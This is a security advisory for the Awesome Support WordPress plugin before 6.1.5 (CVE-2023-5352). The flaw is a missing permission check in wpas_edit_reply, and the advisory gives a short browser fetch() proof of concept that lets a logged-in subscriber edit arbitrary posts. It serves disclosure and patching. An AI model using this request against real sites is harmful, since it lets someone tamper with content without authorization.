WordPress Plugin Vulnerabilities

Awesome Support < 6.1.5 - Insufficient permission check in wpas_edit_reply

Description

The plugin does not correctly authorize the wpas_edit_reply function, allowing users to edit posts for which they do not have permission.

Proof of Concept

Log in as a subscriber and run the following code in the browser, setting the reply_id to any post ID.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "wpas_edit_reply", "reply_id": "1", "reply_content": "hello"}),
  "method": "POST",
  "credentials": "include"
});

Affects Plugins

Plugin icon
awesome-support
Fixed in 6.1.5

References

CVE
CVE-2023-5352

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
https://cert.pl
Submitter twitter
cert_polska_en
Verified
Yes
WPVDB ID
d32b2136-d923-4f36-bd76-af4578deb23b

Timeline

Publicly Published
2023-10-16 (about 1 months ago)
Added
2023-10-16 (about 1 months ago)
Last Updated
2023-10-17 (about 1 months ago)

Other

Published
Title
Published
2020-12-14
Title
Total Upkeep by BoldGrid < 1.14.10 - Sensitive Data Disclosure (Server IP Address, UID etc)
Published
2023-07-17
Title
Qubely < 1.8.6 - Unauthenticated Arbitrary E-mail Sending
Published
2021-11-01
Title
Contest Gallery < 13.1.0.6 - Missing Access Controls to Unauthenticated SQL injection / Email Address Disclosure
Published
2023-06-02
Title
VK Blocks < 1.58.0.0 - Contributor+ Settings Update via REST API
Published
2022-01-05
Title
SupportCandy < 2.2.5 - Unauthenticated Arbitrary Ticket Deletion